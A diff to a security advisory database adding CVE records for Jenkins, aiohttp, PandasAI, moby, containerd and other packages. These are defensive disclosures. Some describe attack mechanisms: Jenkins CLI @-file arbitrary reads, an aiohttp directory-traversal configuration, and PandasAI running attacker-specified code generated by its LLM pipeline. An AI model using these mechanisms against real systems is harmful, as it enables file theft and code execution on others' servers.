{ + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23637" + }, + { + "type": "WEB", + "url": "https://github.com/OctoPrint/OctoPrint/commit/1729d167b4ae4a5835bbc7211b92c6828b1c4125" + }, + { + "type": "PACKAGE", + "url": "https://github.com/OctoPrint/OctoPrint" + }, + { + "type": "WEB", + "url": "https://github.com/OctoPrint/OctoPrint/releases/tag/1.10.0rc1" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/octoprint/PYSEC-2024-29.yaml" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287", + "CWE-620" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T18:04:48Z", + "nvd_published_at": "2024-01-31T18:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-5g73-69p4-7gvx/GHSA-5g73-69p4-7gvx.json b/advisories/github-reviewed/2024/01/GHSA-5g73-69p4-7gvx/GHSA-5g73-69p4-7gvx.json index 094f2ba1582a4..526f743591bcc 100644 --- a/advisories/github-reviewed/2024/01/GHSA-5g73-69p4-7gvx/GHSA-5g73-69p4-7gvx.json +++ b/advisories/github-reviewed/2024/01/GHSA-5g73-69p4-7gvx/GHSA-5g73-69p4-7gvx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5g73-69p4-7gvx", - "modified": "2024-01-22T21:28:23Z", + "modified": "2024-01-29T21:53:03Z", "published": "2024-01-22T03:30:26Z", "aliases": [ "CVE-2024-23752" @@ -9,7 +9,10 @@ "summary": "Code execution in pandasai", "details": "GenerateSDFPipeline in synthetic_dataframe in PandasAI (aka pandas-ai) through 1.5.17 allows attackers to trigger the generation of arbitrary Python code that is executed by SDFCodeExecutor. An attacker can create a dataframe that provides an English language specification of this Python code. NOTE: the vendor previously attempted to restrict code execution in response to a separate issue, CVE-2023-39660.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { @@ -48,9 +51,10 @@ ], "database_specific": { "cwe_ids": [ + "CWE-862", "CWE-94" ], - "severity": "HIGH", + "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2024-01-22T21:28:23Z", "nvd_published_at": "2024-01-22T01:15:08Z" diff --git a/advisories/github-reviewed/2024/01/GHSA-5h86-8mv2-jq9f/GHSA-5h86-8mv2-jq9f.json b/advisories/github-reviewed/2024/01/GHSA-5h86-8mv2-jq9f/GHSA-5h86-8mv2-jq9f.json new file mode 100644 index 0000000000000..18187b7a44e99 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-5h86-8mv2-jq9f/GHSA-5h86-8mv2-jq9f.json @@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5h86-8mv2-jq9f", + "modified": "2024-01-30T16:12:20Z", + "published": "2024-01-29T22:31:03Z", + "aliases": [ + "CVE-2024-23334" + ], + "summary": "aiohttp is vulnerable to directory traversal", + "details": "### Summary\nImproperly configuring static resource resolution in aiohttp when used as a web server can result in the unauthorized reading of arbitrary files on the system.\n\n### Details\nWhen using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if a given file path is within the root directory.This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present.\n\ni.e. An application is only vulnerable with setup code like:\n```\napp.router.add_routes([\n web.static(\"/static\", \"static/\", follow_symlinks=True), # Remove follow_symlinks to avoid the vulnerability\n])\n```\n\n### Impact\nThis is a directory traversal vulnerability with CWE ID 22. When using aiohttp as a web server and enabling static resource resolution with `follow_symlinks` set to True, it can lead to this vulnerability. This vulnerability has been present since the introduction of the `follow_symlinks` parameter.\n\n### Workaround\nEven if upgrading to a patched version of aiohttp, we recommend following these steps regardless.\n\nIf using `follow_symlinks=True` outside of a restricted local development environment, disable the option immediately. This option is NOT needed to follow symlinks which point to a location _within_ the static root directory, it is _only_ intended to allow a symlink to break out of the static directory. Even with this CVE fixed, there is still a substantial risk of misconfiguration when using this option on a server that accepts requests from remote users.\n\nAdditionally, aiohttp has always recommended using a reverse proxy server (such as nginx) to handle static resources and _not_ to use these static resources in aiohttp for production environments. Doing so also protects against this vulnerability, and is why we expect the number of affected users to be very low.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/pull/8079/files", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "aiohttp" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.5" + }, + { + "fixed": "3.9.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23334" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/pull/8079" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/pull/8079/files" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/aio-libs/aiohttp" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/aiohttp/PYSEC-2024-24.yaml" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-29T22:31:03Z", + "nvd_published_at": "2024-01-29T23:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-67m4-qxp3-j6hh/GHSA-67m4-qxp3-j6hh.json b/advisories/github-reviewed/2024/01/GHSA-67m4-qxp3-j6hh/GHSA-67m4-qxp3-j6hh.json new file mode 100644 index 0000000000000..f620f61b35427 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-67m4-qxp3-j6hh/GHSA-67m4-qxp3-j6hh.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-67m4-qxp3-j6hh", + "modified": "2024-01-30T20:57:59Z", + "published": "2024-01-30T20:57:59Z", + "aliases": [ + "CVE-2024-23838" + ], + "summary": "TrueLayer.Client SSRF when fetching payment or payment provider", + "details": "### Impact\nThe vulnerability could potentially allow a malicious actor to gain control over the destination URL of the HttpClient used in the API classes. For applications using the SDK, requests to unexpected resources on local networks or to the internet could be made which could lead to information disclosure.\n\n### Patches\nVersions of TrueLayer.Client `v1.6.0` and later are not affected.\n\n### Workarounds\nThe issue can be mitigated by having strict egress rules limiting the destinations to which requests can be made, and applying strict validation to any user input passed to the TrueLayer.Client library.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "NuGet", + "name": "TrueLayer.Client" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.6.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/TrueLayer/truelayer-dotnet/security/advisories/GHSA-67m4-qxp3-j6hh" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23838" + }, + { + "type": "WEB", + "url": "https://github.com/TrueLayer/truelayer-dotnet/commit/75e436ed5360faa73d6e7ce3a9903a3c49505e3e" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TrueLayer/truelayer-dotnet" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T20:57:59Z", + "nvd_published_at": "2024-01-30T17:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-6f9g-cxwr-q5jr/GHSA-6f9g-cxwr-q5jr.json b/advisories/github-reviewed/2024/01/GHSA-6f9g-cxwr-q5jr/GHSA-6f9g-cxwr-q5jr.json index f7f51654a976b..398e2f4ea1292 100644 --- a/advisories/github-reviewed/2024/01/GHSA-6f9g-cxwr-q5jr/GHSA-6f9g-cxwr-q5jr.json +++ b/advisories/github-reviewed/2024/01/GHSA-6f9g-cxwr-q5jr/GHSA-6f9g-cxwr-q5jr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6f9g-cxwr-q5jr", - "modified": "2024-01-26T01:56:43Z", + "modified": "2024-01-31T20:20:22Z", "published": "2024-01-24T18:31:02Z", "aliases": [ "CVE-2024-23897" @@ -9,7 +9,10 @@ "summary": "Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE", "details": "\n\nJenkins has a built-in command line interface (CLI) to access Jenkins from a script or shell environment.\n\nJenkins uses the args4j library to parse command arguments and options on the Jenkins controller when processing CLI commands. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file’s contents (expandAtFiles). This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it.\n\nThis allows attackers to read arbitrary files on the Jenkins controller file system using the default character encoding of the Jenkins controller process.\n\n* Attackers with Overall/Read permission can read entire files.\n\n* Attackers without Overall/Read permission can read the first few lines of files. The number of lines that can be read depends on available CLI commands. As of publication of this advisory, the Jenkins security team has found ways to read the first three lines of files in recent releases of Jenkins without having any plugins installed, and has not identified any plugins that would increase this line count.\n\nBinary files containing cryptographic keys used for various Jenkins features can also be read, with some limitations (see note on binary files below). As of publication, the Jenkins security team has confirmed the following possible attacks in addition to reading contents of all files with a known file path. All of them leverage attackers' ability to obtain cryptographic keys from binary files, and are therefore only applicable to instances where that is feasible.\n", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { @@ -22,13 +25,47 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.222.1" + "introduced": "1.606" }, { - "fixed": "2.427" + "fixed": "2.426.3" } ] } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.426.2" + } + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.427" + }, + { + "fixed": "2.442" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.440" + } + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "versions": [ + "2.441" ] } ], @@ -41,6 +78,14 @@ "type": "WEB", "url": "https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314" }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176839/Jenkins-2.441-LTS-2.426.3-CVE-2024-23897-Scanner.html" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176840/Jenkins-2.441-LTS-2.426.3-Arbitrary-File-Read.html" + }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/01/24/6" diff --git a/advisories/github-reviewed/2024/01/GHSA-6fj5-m822-rqx8/GHSA-6fj5-m822-rqx8.json b/advisories/github-reviewed/2024/01/GHSA-6fj5-m822-rqx8/GHSA-6fj5-m822-rqx8.json new file mode 100644 index 0000000000000..cd501f073d791 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-6fj5-m822-rqx8/GHSA-6fj5-m822-rqx8.json @@ -0,0 +1,105 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6fj5-m822-rqx8", + "modified": "2024-01-31T23:16:46Z", + "published": "2024-01-31T23:16:46Z", + "aliases": [ + "CVE-2021-21285" + ], + "summary": "moby docker daemon crash during image pull of malicious image", + "details": "### Impact\n\nPulling an intentionally malformed Docker image manifest crashes the `dockerd` daemon.\n\n### Patches\n\nVersions 20.10.3 and 19.03.15 contain patches that prevent the daemon from crashing.\n\n### Credits\n\nMaintainers would like to thank Josh Larsen, Ian Coldwater, Duffie Cooley, Rory McCune for working on the vulnerability and Brad Geesaman for responsibly disclosing it to security@docker.com.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/moby" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "19.3.15" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/moby" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "20.10.0-beta1" + }, + { + "fixed": "20.10.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/moby/moby/security/advisories/GHSA-6fj5-m822-rqx8" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21285" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/commit/8d3179546e79065adefa67cc697c09d0ab137d30" + }, + { + "type": "WEB", + "url": "https://docs.docker.com/engine/release-notes/#20103" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/releases/tag/v19.03.15" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/releases/tag/v20.10.3" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202107-23" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20210226-0005/" + }, + { + "type": "WEB", + "url": "https://www.debian.org/security/2021/dsa-4865" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400", + "CWE-754" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:16:46Z", + "nvd_published_at": "2021-02-02T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-6g2q-w5j3-fwh4/GHSA-6g2q-w5j3-fwh4.json b/advisories/github-reviewed/2024/01/GHSA-6g2q-w5j3-fwh4/GHSA-6g2q-w5j3-fwh4.json new file mode 100644 index 0000000000000..0400b10d946c6 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-6g2q-w5j3-fwh4/GHSA-6g2q-w5j3-fwh4.json @@ -0,0 +1,121 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6g2q-w5j3-fwh4", + "modified": "2024-01-31T23:22:45Z", + "published": "2024-01-31T23:22:45Z", + "aliases": [ + "CVE-2021-21334" + ], + "summary": "containerd environment variable leak", + "details": "## Impact\n\nContainers launched through containerd's CRI implementation (through Kubernetes, crictl, or any other pod/container client that uses the containerd CRI service) that share the same image may receive incorrect environment variables, including values that are defined for other containers. If the affected containers have different security contexts, this may allow sensitive information to be unintentionally shared.\n\nIf you are not using containerd’s CRI implementation (through one of the mechanisms described above), you are not vulnerable to this issue.\n\nIf you are not launching multiple containers or Kubernetes pods from the same image which have different environment variables, you are not vulnerable to this issue.\n\nIf you are not launching multiple containers or Kubernetes pods from the same image in rapid succession, you have reduced likelihood of being vulnerable to this issue\n\n## Patches\n\nThis vulnerability has been fixed in containerd 1.3.10 and containerd 1.4.4. Users should update to these versions as soon as they are released.\n\n## Workarounds\n\nThere are no known workarounds.\n\n## For more information\n\nIf you have any questions or comments about this advisory:\n\n* [Open an issue](https://github.com/containerd/containerd/issues/new/choose)\n* Email us at security@containerd.io if you think you’ve found a security bug.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/containerd/containerd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4.0" + }, + { + "fixed": "1.4.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/containerd/containerd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.3.10" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/containerd/containerd/security/advisories/GHSA-6g2q-w5j3-fwh4" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21334" + }, + { + "type": "WEB", + "url": "https://github.com/containerd/cri/pull/1628" + }, + { + "type": "WEB", + "url": "https://github.com/containerd/cri/pull/1629" + }, + { + "type": "WEB", + "url": "https://github.com/containerd/containerd/commit/05f951a3781f4f2c1911b05e61c160e9c30eaa8e" + }, + { + "type": "WEB", + "url": "https://github.com/containerd/containerd/commit/2d9c8aa4b3f4313982c5c999af57212a1c5d144b" + }, + { + "type": "WEB", + "url": "https://github.com/containerd/containerd/commit/cbcb2f57fbe221986f96b552855eb802f63193de" + }, + { + "type": "WEB", + "url": "https://github.com/containerd/containerd/releases/tag/v1.3.10" + }, + { + "type": "WEB", + "url": "https://github.com/containerd/containerd/releases/tag/v1.4.4" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KUE2Z2ZUWBHRU36ZGBD2YSJCYB6ELPXE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QIBPKSX5IOWPM3ZPFB3JVLXWDHSZTTWT/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VTXHA5JOWQRCCUZH7ZQBEYN6KZKJEYSD/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202105-33" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200", + "CWE-668" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:22:45Z", + "nvd_published_at": "2021-03-10T22:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-6hwg-w5jg-9c6x/GHSA-6hwg-w5jg-9c6x.json b/advisories/github-reviewed/2024/01/GHSA-6hwg-w5jg-9c6x/GHSA-6hwg-w5jg-9c6x.json new file mode 100644 index 0000000000000..d8a6f9c5f452f --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-6hwg-w5jg-9c6x/GHSA-6hwg-w5jg-9c6x.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6hwg-w5jg-9c6x", + "modified": "2024-01-31T23:13:10Z", + "published": "2024-01-31T23:13:10Z", + "aliases": [ + "CVE-2020-27534" + ], + "summary": "Path Traversal in Moby builder", + "details": "util/binfmt_misc/check.go in Builder in Docker Engine before 19.03.9 calls os.OpenFile with a potentially unsafe qemu-check temporary pathname, constructed with an empty first argument in an ioutil.TempDir call.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/moby" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "19.03.9" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27534" + }, + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/pull/1462" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/pull/40877" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1921154" + }, + { + "type": "WEB", + "url": "http://web.archive.org/web/20200530054359/https://docs.docker.com/engine/release-notes/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:13:10Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-6m72-467w-94rh/GHSA-6m72-467w-94rh.json b/advisories/github-reviewed/2024/01/GHSA-6m72-467w-94rh/GHSA-6m72-467w-94rh.json new file mode 100644 index 0000000000000..afdb7960c63d4 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-6m72-467w-94rh/GHSA-6m72-467w-94rh.json @@ -0,0 +1,112 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6m72-467w-94rh", + "modified": "2024-01-31T23:11:32Z", + "published": "2024-01-31T23:11:32Z", + "aliases": [ + "CVE-2020-28053" + ], + "summary": "Privilege Escalation in HashiCorp Consul", + "details": "HashiCorp Consul and Consul Enterprise 1.2.0 up to 1.8.5 allowed operators with operator:read ACL permissions to read the Connect CA private key configuration. Fixed in 1.6.10, 1.7.10, and 1.8.6.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/consul" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.2.0" + }, + { + "fixed": "1.6.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/consul" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.7.0" + }, + { + "fixed": "1.7.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/consul" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.8.0" + }, + { + "fixed": "1.8.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28053" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/consul/pull/9240" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/consul/commit/ff5215d882ac51b49c2647aac46b42aa9c890ce3" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/consul/blob/master/CHANGELOG.md#186-november-19-2020" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202208-09" + }, + { + "type": "WEB", + "url": "https://www.hashicorp.com/blog/category/consul" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732", + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:11:32Z", + "nvd_published_at": "2020-11-23T14:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-6p78-f7h9-6838/GHSA-6p78-f7h9-6838.json b/advisories/github-reviewed/2024/01/GHSA-6p78-f7h9-6838/GHSA-6p78-f7h9-6838.json new file mode 100644 index 0000000000000..f16a006ecde6f --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-6p78-f7h9-6838/GHSA-6p78-f7h9-6838.json @@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6p78-f7h9-6838", + "modified": "2024-02-05T23:06:18Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2023-36260" + ], + "summary": "Craft CMS Feed-Me", + "details": "An issue discovered in Craft CMS version 4.6.1.1 allows remote attackers to cause a denial of service (DoS) via crafted string to Feed-Me Name and Feed-Me URL fields due to saving a feed using an Asset element type with no volume selected.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.6.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36260" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/feed-me/commit/b5d6ede51848349bd91bc95fec288b6793f15e28" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/feed-me/commit/b5d6ede51848349bd91bc95fec288b6793f15e28%29" + }, + { + "type": "PACKAGE", + "url": "https://github.com/craftcms/feed-me" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/feed-me/releases/tag/4.6.2" + }, + { + "type": "WEB", + "url": "https://www.linkedin.com/pulse/threat-briefing-craftcms-amrcybersecurity-emi0e/?trackingId=E75GttWvQp6gfvPiJDDUBA%3D%3D" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T18:42:48Z", + "nvd_published_at": "2024-01-30T09:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-6wh2-8hw7-jw94/GHSA-6wh2-8hw7-jw94.json b/advisories/github-reviewed/2024/01/GHSA-6wh2-8hw7-jw94/GHSA-6wh2-8hw7-jw94.json new file mode 100644 index 0000000000000..431d3bc8716a8 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-6wh2-8hw7-jw94/GHSA-6wh2-8hw7-jw94.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6wh2-8hw7-jw94", + "modified": "2024-01-30T23:47:50Z", + "published": "2024-01-30T23:47:50Z", + "aliases": [ + "CVE-2018-18625" + ], + "summary": "Grafana XSS via adding a link in General feature", + "details": "Grafana 5.3.1 has XSS via a link on the \"Dashboard > All Panels > General\" screen. NOTE: this issue exists because of an incomplete fix for CVE-2018-12099.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.0.0-beta1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-18625" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/11813" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/14984" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20200608-0008/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:47:50Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-7452-xqpj-6rpc/GHSA-7452-xqpj-6rpc.json b/advisories/github-reviewed/2024/01/GHSA-7452-xqpj-6rpc/GHSA-7452-xqpj-6rpc.json new file mode 100644 index 0000000000000..c69928eddc2c6 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-7452-xqpj-6rpc/GHSA-7452-xqpj-6rpc.json @@ -0,0 +1,104 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7452-xqpj-6rpc", + "modified": "2024-01-31T23:14:25Z", + "published": "2024-01-31T23:14:25Z", + "aliases": [ + "CVE-2021-21284" + ], + "summary": "moby Access to remapped root allows privilege escalation to real root", + "details": "### Impact\n\nWhen using `--userns-remap`, if the root user in the remapped namespace has access to the host filesystem they can modify files under `/var/lib/docker/` that cause writing files with extended privileges.\n\n### Patches\n\nVersions 20.10.3 and 19.03.15 contain patches that prevent privilege escalation from remapped user.\n\n### Credits\n\nMaintainers would like to thank Alex Chapman for discovering the vulnerability; @awprice, @nathanburrell, @raulgomis, @chris-walz, @erin-jensby, @bassmatt, @mark-adams, @dbaxa for working on it and Zac Ellis for responsibly disclosing it to security@docker.com", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/moby" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "19.3.15" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/moby" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "20.10.0-beta1" + }, + { + "fixed": "20.10.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/moby/moby/security/advisories/GHSA-7452-xqpj-6rpc" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21284" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/commit/64bd4485b3a66a597c02c95f5776395e540b2c7c" + }, + { + "type": "WEB", + "url": "https://docs.docker.com/engine/release-notes/#20103" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/releases/tag/v19.03.15" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/releases/tag/v20.10.3" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202107-23" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20210226-0005/" + }, + { + "type": "WEB", + "url": "https://www.debian.org/security/2021/dsa-4865" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": 